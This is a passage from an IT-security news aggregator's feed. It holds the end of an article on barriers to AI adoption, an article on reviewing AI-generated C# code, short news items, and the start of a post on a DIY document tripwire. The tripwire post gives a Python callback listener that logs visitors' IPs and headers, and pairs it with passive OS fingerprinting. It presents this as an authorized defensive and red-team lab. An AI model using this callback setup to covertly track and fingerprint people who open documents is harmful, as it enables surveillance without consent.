<p>There is a common refrain, and new <a href="https://www.gartner.com/en/newsroom/press-releases/2026-05-13-gartner-hr-research-reveals-ai-will-create-more-jobs-than-it-eliminates-beginning-in-2028" rel="nofollow">research from Gartner</a> to boot, that beginning in 2028, AI will create more jobs than it eliminates. Even so, such assurances can ring hollow to employees. The bitter pill for tech leaders to swallow is that there is little certainty that the jobs to be created will be well-paid or accessible to workers whose roles were eliminated.</p>



<p>Tech leaders are often surrounded by high performers, innovators and professionals who naturally view change as an opportunity. In these environments, it’s easy to overlook that many workers experience transformation differently—and would prefer predictability over a disruption to their routine or simply don’t have the bandwidth to pivot.</p>



<p>Take secretarial work, which was once a well-compensated role, especially for women without an advanced degree. Technology—namely computers, email, software and virtual assistants—enabled the reduction in demand for these professionals, not overnight but over the course of several decades. More than 2.1 million administrative and office support jobs have disappeared in the U.S. since 2000, according to Labor Department data. While there are many professionals who upskilled or changed careers, <a href="https://www.washingtonpost.com/business/economy/administrative-assistant-jobs-helped-propel-many-women-into-the-middle-class-now-theyre-disappearing/2019/12/04/75686efe-f6a0-11e9-a285-882a8e386a96_story.html" rel="nofollow">The Washington Post</a> reports that middle-aged and older workers have had a hard time finding work within their skill set with similar pay and benefits.</p>



<p>On the other end of the spectrum, AI is empowering many employees to lift the ceiling on their potential by expanding what we can do and who can contribute high-value work. A rising tide may lift all boats, but those who Microsoft dubs “Frontier Professionals,” who are the most advanced AI users, are most likely to benefit from new job opportunities created by AI. The <a href="https://writer.com/blog/enterprise-ai-adoption-2026/" rel="nofollow">Writer</a> study shows that 92% of the C-suite are actively cultivating “AI elite” employees, while 60% plan layoffs for non-adopters.</p>



<p>No leader can promise what the labor market will look like a decade from now. What they can do is provide clarity about the next six months to two years. Moreover, supporting employees with tools that help them prepare for the future is more valuable than trying to offer certainty about the future.</p>



<p>Provide a transparent roadmap for your organization’s AI implementation goals. Acknowledge the fear, but also the possibility, and help employees process the changes they are living through by providing access to information, continuing education, <a href="https://www.cio.com/article/4165040/you-cant-train-your-way-out-of-the-ai-skills-gap.html">redesigned workflows</a> and sandbox environments for AI learning and experimentation. The exact way your organization approaches the fear of job replacement will depend on the nature of your industry and its professionals. Some roles will change dramatically in a few years, while others may change slowly over decades, as secretarial roles did.</p>



<p>Ironically, despite fears of job displacement, AI workforce impact remains low, according to <a href="https://www.deloitte.com/us/en/what-we-do/capabilities/applied-artificial-intelligence/content/state-of-ai-in-the-enterprise.html" rel="nofollow">The State of AI in the Enterprise Report</a>. The most immediate barrier to AI adoption is often the opposite: a shortage of AI skills and systems. </p>



<h2 class="wp-block-heading">2. Lack of AI-first culture</h2>



<p>Many organizations purchase AI technology without redesigning current business processes and workflows around it, which can lead to failed adoption. AI adoption is less like a software rollout and more like an organizational transformation initiative that requires “cultural openness” to a process or workflow reset.</p>



<p>Despite the anxiety around AI at work, the <a href="https://www.microsoft.com/en-us/worklab/work-trend-index/agents-human-agency-and-the-opportunity-for-every-organization" rel="nofollow">Microsoft Work Trend Index Annual Report</a> found that “In many cases, people are ready. The systems around them are not.” The research shows that 65% of AI users fear falling behind if they don’t adapt fast. Yet 45% say it feels safer to stick with current goals than to redesign work with AI—and only 13% are rewarded for reinventing how they work, even when results fall short. This demonstrates a paradox where organizational metrics, incentives and norms keep employees anchored to the past way of doing things.</p>



<p>There is no universal blueprint for an AI-first culture. What it looks like will vary by organization, industry and workforce, and it will continue to evolve as AI capabilities mature. But a common thread is prioritizing a growth mindset. As Microsoft Chief People Officer Amy Coleman and WSJ Leadership Institute President Alan Murray discussed in a recent <a href="https://www.wsj.com/video/building-an-aifirst-humancentered-culture/3AE514C2-CEF0-4A13-8ADF-9ED06E86AB84" rel="nofollow">interview</a>, “Stop being a know-it-all company and start being a learn-it-all company.” That means encouraging experimentation despite imperfect conditions, permitting employees to fail, rewarding those who succeed, and ensuring leaders model the behaviors they want to see.</p>



<p>Learning and development alone are not enough. An AI-first culture must also prioritize strong <a href="https://www.cio.com/article/4136833/its-not-your-ai-thats-failing-its-your-data.html">data foundations</a> and workflows, which may be one of the most challenging barriers to overcome. <a href="https://www.deloitte.com/us/en/what-we-do/capabilities/applied-artificial-intelligence/content/state-of-ai-in-the-enterprise.html" rel="nofollow">The State of AI in the Enterprise Report</a> found that although 42% of companies surveyed believe their strategy is highly prepared for AI adoption, they feel less prepared in terms of infrastructure, data, risk and talent.</p>



<p>For leaders who view culture as a secondary concern, the numbers tell a different story. The Microsoft report revealed 67% of AI impact comes from culture, manager support and talent practices, which is more than double the 32% tied to individual mindset and behavior.</p>



<h2 class="wp-block-heading">3. Competing priorities and misaligned incentives</h2>



<p>One of the least discussed reasons AI projects fail is that different stakeholders are optimizing for fundamentally different definitions of success. Consider an ITSM AI initiative: the CIO is tasked with reducing technology costs, the service desk wants faster ticket resolution, builders want scalable systems and the legal department is concerned about compliance and liability. Each group may support the project in principle, but they are measuring success through entirely different lenses.</p>



<p>Without alignment on a shared business objective, teams might struggle to balance the inevitable trade-offs AI projects require. Teams optimize for their own priorities rather than a common outcome, resulting in slower decisions, competing incentives and a lack of ROI. They might also be working off of incentive structures that reward the old way of doing things. For example, if an IT team is rewarded based on tickets resolved, there is little incentive to drive down ticket volume in the first place.</p>



<p>In some organizations, the problem runs even deeper. Rather than optimizing for a business outcome, they’re optimizing for appearances. <a href="https://writer.com/blog/enterprise-ai-adoption-2026/" rel="nofollow">75%</a> of executives acknowledge their company’s AI strategy is more performative than practical—existing primarily to signal innovation rather than to provide meaningful business results. Much like offices that touted high-end photocopiers in the 1980s that nobody knew how to use, investments in this vein can end up costing way more than they’re worth.</p>



<p>Unlike underutilized photocopiers, the stakes of failing at AI adoption are high. Though the underlying challenges are nothing new, what is new is the scale of AI’s impact and the risk of falling behind competitors that get it right. (Yes, I recognize the irony of referencing photocopier technology while writing about AI.)</p>



<h2 class="wp-block-heading">4. Excuses</h2>



<p>When explaining why AI projects stall, there are sometimes excuses:</p>



<ul class="wp-block-list">
<li>The vendor overpromised</li>



<li>We chose the wrong model</li>



<li>The technology wasn’t mature enough</li>



<li>Compliance and legal slowed us down</li>



<li>We didn’t have the right talent</li>



<li>The market changed</li>
</ul>



<p>These concerns are valid but rarely insurmountable. Nearly every successful AI program has had to navigate some combination of imperfect circumstances. It’s important to treat these challenges as hurdles, not dead ends, and find ways around them by having a growth mindset culture and bringing in expertise where needed.</p>



<p>I’ve yet to see a project fail because leaders cared too much about communication, culture, alignment or commitment over the long-term. More often, the opposite is true. AI may be one of the most significant technological shifts of our lifetime, but success still depends on fundamentals: strong leadership, adaptable culture, clear objectives and a willingness to act.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Best practices for using AI to generate C# code]]></title>
<description><![CDATA[AI-powered software development tools integrate with your IDE and codebase, helping you to write, refactor, and fix code faster. These tools also make it fast and easy to create and run unit tests and integration tests — tasks that take more time when done manually.



Today, .NET developers ofte...]]></description>
<link>https://tsecurity.de/de/3640601/ai-nachrichten/best-practices-for-using-ai-to-generate-c-code/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640601/ai-nachrichten/best-practices-for-using-ai-to-generate-c-code/</guid>
<pubDate>Thu, 02 Jul 2026 11:04:37 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>AI-powered software development tools integrate with your IDE and codebase, helping you to write, refactor, and fix code faster. These tools also make it fast and easy to create and run unit tests and integration tests — tasks that take more time when done manually.</p>



<p>Today, .NET developers often use <a href="https://www.infoworld.com/article/3609013/github-copilot-everything-you-need-to-know.html" data-type="link" data-id="https://www.infoworld.com/article/3609013/github-copilot-everything-you-need-to-know.html">GitHub Copilot</a>, <a href="https://www.infoworld.com/article/4136718/claude-code-is-blowing-me-away.html" data-type="link" data-id="https://www.infoworld.com/article/4136718/claude-code-is-blowing-me-away.html">Claude Code</a>, Cursor AI, and even AI chatbots like ChatGPT to generate code. In this article, we’ll cover some best practices you should follow when using AI to generate your C# code.</p>



<h2 class="wp-block-heading">Challenges of using AI-generated code</h2>



<p>While AI can write code for you, often the generated code does not work as intended. AI may generate code that contains logic errors, bugs, or security vulnerabilities, or code that doesn’t conform to your organization’s coding conventions or quality standards, or code that isn’t compatible with existing architecture. Further, AI may generate code that runs slowly or fails to run at all.</p>



<p>These are some of the key challenges organizations face when using AI-generated code in production:</p>



<ul class="wp-block-list">
<li>Inconsistency: The quality of AI-generated code can vary widely because the same generative AI prompt can produce different results, making it impossible to trust the code until it has been reviewed.</li>



<li>Security: The potential for AI-generated code to generate insecure code is significant, because models are trained on open-source code that contains security vulnerabilities including weak/unsafe validation, injection patterns, hard-coded secrets, memory safety issues, and outdated dependencies.</li>



<li>Accountability: AI-generated code often creates an accountability gap because organizations find they have limited visibility into how AI-assisted code was generated, approved, and tested.</li>



<li>Contextual concerns: Because your AI-powered tool may not have access to project-specific conventions, abstractions, or business rules, the code it generates may not conform to the standards of your organization’s codebase.</li>



<li>Overengineering: AI models can produce large amounts of unnecessary code and create additional layers of abstraction, making the code more complex and more difficult to understand and maintain.</li>



<li>Error handling: Often, AI-generated code succeeds in creating the required logic based on the “happy path” of an application, but does not create sufficient or adequate recovery, retry, or validation logic. Additionally, AI-generated code may not incorporate proper error handling mechanisms.</li>



<li>Technical debt: The sheer amount of generated code can require additional resources for reviewing, cleaning, refactoring, and debugging the code after the fact, as well as for maintaining the code in the future.</li>
</ul>



<h2 class="wp-block-heading">Best practices for using AI to write code</h2>



<p>Here are some of the best practices you should follow when writing code using AI-powered tools:</p>



<h3 class="wp-block-heading">Write clear and specific prompts</h3>



<p>To get the best use of AI-assisted coding tools, you should be proficient in prompt engineering. Your prompts should be specific, concise, and contain relevant code examples to enable your AI-powered tools to generate code that is functional, meets the requirements, and conforms to the standards and guidelines. Most importantly, you should plan precisely on the architecture and design, the exact solution you need, the structure of the codebase, and the coding and design guidelines to follow.</p>



<h3 class="wp-block-heading">Use AI as a peer programmer</h3>



<p>You should always treat AI as a peer programmer and your (junior) coding assistant. You should always review code the AI generates for you, run tests, and perform audits to validate correctness, conformance to guidelines and standards, performance and scalability bottlenecks, and security vulnerabilities. Based on the outcome of the audit, you should refactor your AI-generated code accordingly. And, repeat this cycle iteratively — audit followed by refactoring (if required) — until you are satisfied with the code.</p>



<h3 class="wp-block-heading">Favor quality over speed</h3>



<p>Your application source code should be performant, scalable, secure, extendable, and easy to comprehend and maintain. One of the biggest challenges of using AI-generated code is ensuring it meets requirements and conforms to the guidelines and standards of your organization without compromising on performance, scalability, and security.</p>



<p>AI can generate code for you quite quickly, but the onus is on you to understand how the code works, investigate it for any flaws, test it thoroughly, and change it if and when it is needed. You must be sure to understand the code in its entirety. Unless you comprehend the code, you will never be able to improve or extend it when you need to.</p>



<p>And you must never compromise quality for speed. If you use AI as a shortcut, your code may fail when deployed to the production environment — and that would be a disaster. </p>



<h3 class="wp-block-heading">Provide the right context</h3>



<p>The code your AI-powered tool generates for you will be more useful to you if you’ve provided the right context. You should provide your AI coding tool with comprehensive, up-front information, such as architecture docs, coding standards, and relevant files, rather than just providing instructions using prompts. And you should add images or screenshots when specifying prompts to help your AI-powered tool better understand the context.</p>



<p>Your AI-generated code must be testable for best results. It is always a good practice to specify tests at the time when your AI-enabled tool generates code, as tests can help AI understand the expected behavior and produce code that better aligns with your expectations. Additionally, you should specify the exact goal, the current and/or target technology stack, the relevant code boundaries, and the definition of “done”, i.e., the desired outcome.</p>



<h2 class="wp-block-heading">Creating a Data Transfer Object using GitHub Copilot</h2>



<p>Remember, any AI-powered code generator is only as good as the input provided to it. This input is also known as the prompt. If the prompt you specify does not clearly state the objective, the generated code will not meet your requirements. Here is an example of a prompt that fails to consider performance and lacks clarity.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Generate code to create a Product DTO having fields Id, Name, and Price</p>
</blockquote>



<p>When I entered this prompt into the GitHub Copilot Chat window, the following piece of code was generated. </p>



<pre class="wp-block-code"><code>public class Product
{
   public int Id { get; set; }
   public string Name { get; set; } = string.Empty;
   public decimal Price { get; set; }
   public Product() { }
   public Product(int id, string name, decimal price)
   {
       Id = id; Name = name; Price = price;
   }
}
</code></pre>



<p>Typically, a DTO (Data Transfer Object) should be created using records for improved performance instead of classes. Moreover, a DTO should be immutable by default, because its purpose is to store and pass data from the presentation layer to the business layer in an application. This not only guarantees thread safety but also prevents accidental changes to data and simplifies testability.</p>



<p>Now, let’s change the prompt as shown below and try again. </p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Create an immutable Product DTO using C# that uses the record type, having fields Id, Name, and Price.</p>
</blockquote>



<p>When I entered the above prompt in GitHub Copilot Chat, a record type named ProductDto was created using a positional record as shown below. </p>



<pre class="wp-block-code"><code>public sealed record ProductDto(int Id, string Name, decimal Price);
</code></pre>



<h2 class="wp-block-heading">Creating a logging library using GitHub Copilot</h2>



<p>In this next example, we’ll use GitHub Copilot within the Visual Studio IDE. With GitHub Copilot up and running in our IDE, you can specify the following prompt for creating a logging library using GitHub CoPilot within the Visual Studio IDE:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Create an asynchronous logger using .NET 10 and C# 14 that:</p>



<ul class="wp-block-list">
<li>Stores logs asynchronously in a text file or a database</li>



<li>Uses a SQLite database for storing logs in a database</li>
</ul>



<p>The log target should be configurable, i.e., the storage target of the generated log can be a file, a database, or etc.</p>



<p>Create a separate class for each log target, i.e., FileLogger for storing logs in a file and DbLogger for storing logs in the databas<em>Dave Bermingham</em>e</p>



<p>Incorporate comprehensive error handling mechanism wherever applicable</p>
</blockquote>



<p>Figure 1 shows this prompt in GitHub Copilot (running in Visual Studio) and the files that Copilot generated for the project.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/AI-Csharp-GitHub-Copilot.png?w=373" alt="AI Csharp GitHub Copilot" class="wp-image-4191827" width="373" height="1023" sizes="auto, (max-width: 373px) 100vw, 373px"><figcaption class="wp-element-caption"><p>Figure 1</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Once you have provided the prompt as input to Github Copilot, it will parse the input and generate several files in your project. Figure 2 shows the two projects in the Solution Explorer window — the console application project and the <code>AsyncLogger</code> class library project.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/AI-Csharp-Solution-Explorer.png?w=622" alt="AI Csharp Solution Explorer" class="wp-image-4191830" width="622" height="1024" sizes="auto, (max-width: 622px) 100vw, 622px"><figcaption class="wp-element-caption"><p>Figure 2</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>The <code>AsyncLoggerService</code> class uses the <code>System.Threading.Channel</code> static class to write logs of type <code>LogEntry</code> in the log target, which can be a text file or a database. The <code>System.Threading.Channel</code> class contains two methods to create channels, the <code>CreateBounded</code> and the <code>CreateUnbounded</code> methods.</p>



<p>While <code>CreateBounded</code> is used to create a channel that holds a finite number of messages, <code>CreateUnbounded</code> is used to create a channel with unlimited capacity. You can learn more about working with <code>System.Threading.Channel</code> from my earlier article <a href="https://www.infoworld.com/article/2263338/how-to-use-systemthreadingchannels-in-net-core.html">here</a>.</p>



<h2 class="wp-block-heading">Reviewing the AI-generated code</h2>



<p>Although GitHub Copilot will generate the complete source code of the <code>AsyncLogger</code> library for you, you should carefully examine — and thoroughly test — the generated code before you use it in production. For example, when I submitted the above prompt to Copilot, the code generated included three issues that needed to be addressed. Let’s take a look. </p>



<h3 class="wp-block-heading">Unbounded channel oops</h3>



<p>In the <code>AsyncLoggerService</code> class, GitHub Copilot included the following code that uses an <code>Unbounded</code> channel. </p>



<pre class="wp-block-code"><code>_channel = Channel.CreateUnbounded<logentry>(
    new UnboundedChannelOptions { SingleReader = true, SingleWriter = false });
</logentry></code></pre>



<p>There is a major flaw in this approach. If this code were used in production, memory consumption could surge dramatically under burst traffic (say, 10k or more requests per second). This growth in memory usage could result in GC pressure and eventually a crash of the application.</p>



<p>A better approach is to use a bounded channel with an explicit backpressure strategy, as shown in the code snippet given below.</p>



<pre class="wp-block-code"><code>_channel = Channel.CreateBounded<logentry>(new BoundedChannelOptions(10_000)
{
    FullMode = BoundedChannelFullMode.DropWrite // or Wait
});
</logentry></code></pre>



<h3 class="wp-block-heading">Fire-and-forget oops</h3>



<p>In the <code>LogAsync</code> method, GitHub Copilot included the following statement that contains a fire-and-forget call with no retries and no information if the write operation fails (i.e., if the channel is already closed).</p>



<pre class="wp-block-code"><code>_channel.Writer.TryWrite(entry);
</code></pre>



<p>A better approach is to include a fallback path as shown in the code snippet below.</p>



<pre class="wp-block-code"><code>if (!await _channel.Writer.WaitToWriteAsync())
{
    TryWriteFallback("Channel closed or unavailable");
    return;
}
await _channel.Writer.WriteAsync(entry);
private void TryWriteFallback(string text)
{
    try
    {
        var path = _config.FallbackFilePath ?? "fallback-errors.log";
        var dir = Path.GetDirectoryName(path);
        if (!string.IsNullOrEmpty(dir) &amp;&amp; !Directory.Exists(dir)) 
            Directory.CreateDirectory(dir);
        File.AppendAllText(path, $"[{DateTime.UtcNow:o}] {text}{Environment.NewLine}");
    }
    catch
    {
        // swallow - nothing else we can do
    }
}
</code></pre>



<p>The <code>WaitToWriteAsync</code> method returns true if space is available to write an item, false otherwise. Hence, if no space is available, the <code>TryWriteFallback</code> method will be called and the log written to the fallback-errors.log file.</p>



<p><strong>Using Sync over Async in a Constructor</strong></p>



<p>Finally, GitHub Copilot included the following piece of code in the constructor of the <code>AsyncLoggerService</code> class. </p>



<pre class="wp-block-code"><code>_target.InitializeAsync(_cts.Token).GetAwaiter().GetResult();
</code></pre>



<p>Using sync over async in a constructor in C# is considered an anti-pattern. The reason is because constructors cannot be asynchronous, i.e., you cannot mark a constructor as asynchronous using the <code>async</code> keyword. As a result, you will have to make blocking calls and wait for your asynchronous code to complete execution. And this could result in thread starvation and a deadlock.</p>



<p>A better alternative will be to move the initialization code out of the constructor as shown below. </p>



<pre class="wp-block-code"><code>public async Task InitializeAsync()
{
    await _target.InitializeAsync(_cts.Token);
}
</code></pre>



<h2 class="wp-block-heading">AI-generated code review checklist</h2>



<p>You should verify each item of the following checklist before you integrate AI-generated code into your application. </p>



<ul class="wp-block-list">
<li>Does the code address all specified requirements?</li>



<li>Is the code well-documented?</li>



<li>Are there any security vulnerabilities or security anti-patterns?</li>



<li>Does the code follow C# coding standards and guidelines?</li>



<li>Are the algorithms efficient as far as performance is concerned?</li>



<li>Is the code testable, extensible, and maintainable?</li>



<li>Is the code testable with proper abstractions?</li>



<li>Does the code check for security vulnerabilities such as SQL injection and XSS?</li>



<li>Does the code incorporate N + 1 queries or other inefficient data access approaches?</li>



<li>Does the code comply with naming conventions and code organization standards?</li>



<li>Does the code incorporate error handling, logging, input validation, and configuration?</li>



<li>Does the code use asynchronous programming approaches?</li>



<li>Does the code meet the desired code coverage expectations?</li>
</ul>



<h2 class="wp-block-heading">Takeaways</h2>



<p>AI can help you create all of your boilerplate code, provide suggestions for best practices, and greatly speed up your exploration and research efforts. However, you should remember that AI is not a replacement for human intelligence, experience, and innovation. You should treat your AI-powered coding tool as your coworker or assistant and not your replacement. </p>



<p>You should take advantage of AI to do all of the tedious, monotonous work so that you can concentrate on the architecture, innovation, and other aspects of software architecture and development that require human involvement. You can take advantage of AI to generate your application’s architecture and design as well. However, the generated architecture and design should be for your reference only — it is entirely on you to decide how much of it you should use and what you need to replace.</p>



<p>Here’s the final word: AI-powered coding tools will help you when you provide them with the correct context and clear instructions. Be sure to review the generated code carefully, and test thoroughly before deploying to production. Expect your AI coding tool to make mistakes, and be prepared to make changes (perhaps over many iterations) to get the performant, reliable, secure, and maintainable code that you need.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Fake Perplexity Chrome extension spies on your searches]]></title>
<description><![CDATA[A fake Perplexity Chrome extension secretly monitored searches. If you installed "Search for perplexity ai," you need to remove it manually.]]></description>
<link>https://tsecurity.de/de/3639655/it-security-nachrichten/fake-perplexity-chrome-extension-spies-on-your-searches/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639655/it-security-nachrichten/fake-perplexity-chrome-extension-spies-on-your-searches/</guid>
<pubDate>Wed, 01 Jul 2026 22:38:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A fake Perplexity Chrome extension secretly monitored searches. If you installed "Search for perplexity ai," you need to remove it manually.]]></content:encoded>
</item>
<item>
<title><![CDATA[Fake Perplexity Chrome extension spies on your searches]]></title>
<description><![CDATA[A fake Perplexity Chrome extension secretly monitored searches. If you installed “Search for perplexity ai,” you need to remove it manually. This article has been indexed from Malwarebytes Read the original article: Fake Perplexity Chrome extension spies on your searches
Read more →
The post Fake...]]></description>
<link>https://tsecurity.de/de/3639651/it-security-nachrichten/fake-perplexity-chrome-extension-spies-on-your-searches/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639651/it-security-nachrichten/fake-perplexity-chrome-extension-spies-on-your-searches/</guid>
<pubDate>Wed, 01 Jul 2026 22:37:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A fake Perplexity Chrome extension secretly monitored searches. If you installed “Search for perplexity ai,” you need to remove it manually. This article has been indexed from Malwarebytes Read the original article: Fake Perplexity Chrome extension spies on your searches</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/fake-perplexity-chrome-extension-spies-on-your-searches/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/fake-perplexity-chrome-extension-spies-on-your-searches/">Fake Perplexity Chrome extension spies on your searches</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[NASA Launches Daring Robotic Rescue Mission to Save Falling Swift Telescope]]></title>
<description><![CDATA[NASA is preparing a robotic rescue mission to boost the falling Swift telescope, test satellite servicing, and avoid a costly observatory replacement.
The post NASA Launches Daring Robotic Rescue Mission to Save Falling Swift Telescope appeared first on TechRepublic.]]></description>
<link>https://tsecurity.de/de/3639537/it-nachrichten/nasa-launches-daring-robotic-rescue-mission-to-save-falling-swift-telescope/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639537/it-nachrichten/nasa-launches-daring-robotic-rescue-mission-to-save-falling-swift-telescope/</guid>
<pubDate>Wed, 01 Jul 2026 21:32:54 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>NASA is preparing a robotic rescue mission to boost the falling Swift telescope, test satellite servicing, and avoid a costly observatory replacement.</p>
<p>The post <a href="https://www.techrepublic.com/article/news-nasa-swift-boost-robot-rescue-mission/">NASA Launches Daring Robotic Rescue Mission to Save Falling Swift Telescope</a> appeared first on <a href="https://www.techrepublic.com/">TechRepublic</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[This PC gaming launcher for Windows handhelds lets you browse stores and compare the best prices — all in one place]]></title>
<description><![CDATA[Winhanced has introduced a built-in game store that lets users compare prices across multiple storefronts, view Game Pass availability, and receive personalized game recommendations. The update also graduates several long-awaited features from early access, making the launcher an even stronger re...]]></description>
<link>https://tsecurity.de/de/3638988/windows-tipps/this-pc-gaming-launcher-for-windows-handhelds-lets-you-browse-stores-and-compare-the-best-prices-all-in-one-place/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638988/windows-tipps/this-pc-gaming-launcher-for-windows-handhelds-lets-you-browse-stores-and-compare-the-best-prices-all-in-one-place/</guid>
<pubDate>Wed, 01 Jul 2026 17:28:48 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Winhanced has introduced a built-in game store that lets users compare prices across multiple storefronts, view Game Pass availability, and receive personalized game recommendations. The update also graduates several long-awaited features from early access, making the launcher an even stronger replacement for Xbox Mode on Windows handhelds.]]></content:encoded>
</item>
<item>
<title><![CDATA[Beyond Canarytokens: Building a DIY Document Tripwire with Passive OS Fingerprinting]]></title>
<description><![CDATA[Canarytokens are useful, but rebuilding the primitive by hand shows what the callback really means — and how passive OS fingerprinting can enrich CTI, pentest, and red team analysis.At first, I thought Canarytokens were the whole story: generate a token, place it somewhere interesting, wait for t...]]></description>
<link>https://tsecurity.de/de/3638151/hacking/beyond-canarytokens-building-a-diy-document-tripwire-with-passive-os-fingerprinting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638151/hacking/beyond-canarytokens-building-a-diy-document-tripwire-with-passive-os-fingerprinting/</guid>
<pubDate>Wed, 01 Jul 2026 12:21:50 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><em>Canarytokens are useful, but rebuilding the primitive by hand shows what the callback really means — and how passive OS fingerprinting can enrich CTI, pentest, and red team analysis.</em></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*e8-fnFAf-cLqfj20"></figure><p>At first, I thought Canarytokens were the whole story: generate a token, place it somewhere interesting, wait for the alert, and use the callback as an early signal. That is already valuable, especially for security teams that need lightweight tripwires in places where suspicious interaction should never happen.</p><p>But during my lab, I wanted to understand what was happening underneath the alert. What actually happens when a document calls home? What can we learn from the request before turning it into an intelligence conclusion? And, more importantly, what context can we collect that a standard Canarytoken alert may not clearly provide?</p><p>That question changed the direction of the experiment. This was no longer only about creating a simple canary. It became a small CTI and red team reconnaissance lab built around a document callback, a Python listener, HTTP headers, User-Agent analysis, source IP observation, and one extra layer that made the exercise much more interesting: passive operating system fingerprinting with p0f.</p><p>The goal was not to replace Canarytokens. They are excellent for quick operational alerting. The goal was to rebuild the primitive by hand, understand the signal, and enrich it with information that can help CTI, pentest, and red team teams during authorized investigations and security assessments.</p><h3>What Canarytokens Give You — and Why I Wanted More</h3><p>Canarytokens are great because they are simple. You place a token in a document, link, credential, folder, repository, or cloud resource, and if something interacts with it, you get an alert. For many teams, that is already enough to start asking better questions.</p><p>A triggered token may show that a document was opened, a fake credential was tested, a decoy link was visited, or a resource that should have stayed untouched was accessed. In CTI, pentest, and red team work, this kind of signal can be extremely useful because it creates visibility where there would normally be silence.</p><p>But there is a limitation. A standard callback usually gives you information such as the time of the request, the source IP, the token type, and some request metadata. That is useful, but it does not always tell you what kind of system touched the resource. Was it a Windows endpoint? A Linux sandbox? A proxy? A scanner? An email security gateway? A browser preview engine? A security product detonating the document before the user ever saw it?</p><p>This matters because the same callback can mean very different things depending on the infrastructure behind it. A request from a corporate endpoint, a cloud sandbox, a NAT gateway, or a security inspection service should not be interpreted the same way.</p><p>That was the gap I wanted to explore.</p><h3>Building the DIY Document Tripwire</h3><p>This lab has three main components. First, we create a Python HTTP listener that receives the callback and logs metadata. Second, we create a Word document that requests a remote transparent pixel. Third, we run p0f to passively observe the connection and attempt to infer operating system characteristics.</p><p>This is not production infrastructure and it is not a replacement for Canarytokens. It is a learning lab for authorized environments. The purpose is to understand the primitive, enrich the signal, and practice interpretation without overclaiming.</p><p>The goal is security intelligence, not covert surveillance.</p><h3>Step 1: Create the Python Listener</h3><p>The first part of the lab is a small HTTP server. Its job is to receive a GET request, print useful metadata, and return a transparent 1x1 PNG. This simulates the basic behavior of a document callback.</p><p><strong>Objective:</strong> receive the document callback and log the HTTP metadata.</p><pre>#!/usr/bin/env python3<br>from http.server import BaseHTTPRequestHandler, HTTPServer<br>from datetime import datetime<br>import base64# Transparent 1x1 PNG pixel<br>PIXEL = base64.b64decode(<br>    "iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8/x8AAwMCAO+/p9sAAAAASUVORK5CYII="<br>)<br>class Handler(BaseHTTPRequestHandler):<br>    def log_message(self, fmt, *args):<br>        return<br>    def do_GET(self):<br>        print("\n" + "=" * 70)<br>        print("[+] Callback received:", datetime.now().isoformat())<br>        print("[+] Source IP:", self.client_address[0])<br>        print("[+] Path:", self.path)<br>        print("[+] User-Agent:", self.headers.get("User-Agent"))<br>        print("[+] Headers:")<br>        for k, v in self.headers.items():<br>            print(f"    {k}: {v}")<br>        self.send_response(200)<br>        self.send_header("Content-Type", "image/png")<br>        self.send_header("Cache-Control", "no-store")<br>        self.end_headers()<br>        self.wfile.write(PIXEL)<br>if __name__ == "__main__":<br>    host = "0.0.0.0"<br>    port = 8080<br>    print(f"[+] Listening on http://{host}:{port}/pixel.png")<br>    HTTPServer((host, port), Handler).serve_forever()</pre><p>Run the server with:</p><pre>python3 server.py</pre><p>If everything works, the server should start listening on port 8080:</p><pre>[+] Listening on http://0.0.0.0:8080/pixel.png</pre><p>If it fails, the first thing to check is whether another process is already using the port:</p><pre>sudo ss -lntp | grep 8080</pre><p>At this point, we have the application-layer listener. It can show us the source IP as seen by the server, the requested path, the User-Agent, and all HTTP headers. That is useful, but still incomplete. We now need another layer of observation.</p><h3>Step 2: Add p0f for Passive OS Fingerprinting</h3><p>The Python listener tells us what the HTTP request looks like. p0f helps us observe the TCP/IP behavior passively. This is important because headers can be manipulated or generated by intermediate systems, 